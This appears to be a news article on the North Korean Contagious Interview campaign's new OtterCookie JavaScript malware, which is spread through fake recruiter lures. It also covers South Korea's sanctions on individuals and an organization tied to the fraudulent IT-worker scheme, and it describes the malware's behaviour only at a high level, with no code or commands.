North Korean threat actors behind the ongoing Contagious Interview campaign have been observed dropping a new JavaScript malware called OtterCookie.
Contagious Interview (aka DeceptiveDevelopment) refers to a persistent attack campaign that employs social engineering lures, with the hacking crew often posing as recruiters to trick individuals looking for potential job opportunities into downloading malware under the guise of an interview process.
This involves distributing malware-laced videoconferencing apps or npm packages either hosted on GitHub or the official package registry, paving the way for the deployment of malware such as BeaverTail and InvisibleFerret.
Palo Alto Networks Unit 42, which first exposed the activity in November 2023, is tracking the cluster under the moniker CL-STA-0240. It’s also referred to as Famous Chollima and Tenacious Pungsan.
In September 2024, Singaporean cybersecurity company Group-IB documented the first major revision to the attack chain, highlighting the use of an updated version of BeaverTail that adopts a modular approach by offloading its information-stealing functionality to a set of Python scripts collectively tracked as CivetQ.
It’s worth noting at this stage that Contagious Interview is assessed to be disparate from Operation Dream Job, another long-running North Korean hacking campaign that also employs similar job-related decoys to trigger the malware infection process.
The latest findings from Japanese cybersecurity company NTT Security Holdings reveal that the JavaScript malware responsible for launching BeaverTail is also designed to fetch and execute OtterCookie. The new malware is said to have been introduced in September 2024, with a new version detected in the wild last month.
OtterCookie, upon running, establishes communications with a command-and-control (C2) server using the Socket.IO JavaScript library, and awaits further instructions. It’s designed to run shell commands that facilitate data theft, including files, clipboard content, and cryptocurrency wallet keys.
The older OtterCookie variant spotted in September is functionally similar, but incorporates a minor implementation difference wherein the cryptocurrency wallet key theft feature is directly built into the malware, as opposed to a remote shell command.
The development is a sign that the threat actors are actively updating their tools while leaving the infection chain largely untouched, a continued sign of the campaign’s effectiveness.
South Korea Sanctions 15 North Koreans for IT Worker Scam
It also comes as South Korea’s Ministry of Foreign Affairs (MoFA) sanctioned 15 individuals and one organization in connection with a fraudulent IT worker scheme orchestrated by its northern counterpart to illegally generate a steady source of income that can be funneled back to North Korea, steal data, and even demand ransoms in some cases.
There is evidence to suggest that the Famous Chollima threat cluster is behind the insider threat operation as well. It’s also called by various names, such as Nickel Tapestry, UNC5267, and Wagemole.
One of the 15 sanctioned individuals, Kim Ryu Song, was also indicted by the U.S. Department of Justice (DoJ) earlier this month for his alleged involvement in a long-running conspiracy to violate sanctions and commit wire fraud, money laundering, and identity theft by illegally seeking employment in U.S. companies and non-profit organizations.
Also sanctioned by MoFA is the Chosun Geumjeong Economic Information Technology Exchange Company, which has been accused of dispatching a large number of IT personnel to China, Russia, Southeast Asia, and Africa for procuring funds for the regime by securing freelance or full-time jobs in Western companies.
These IT workers are said to be part of the 313th General Bureau, an organization under the Munitions Industry Department of the Workers’ Party of Korea.
“The 313th General Bureau […] dispatches many North Korean IT personnel overseas and uses the foreign currency earned to secure funds for nuclear and missile development, and is also involved in the development of software for the military sector,” the ministry said.
“North Korea’s illegal cyber activities are not only criminal acts that threaten the safety of the cyber ecosystem, but also pose a serious threat to international peace and security as they are used as funds for North Korea’s nuclear and missile development.”
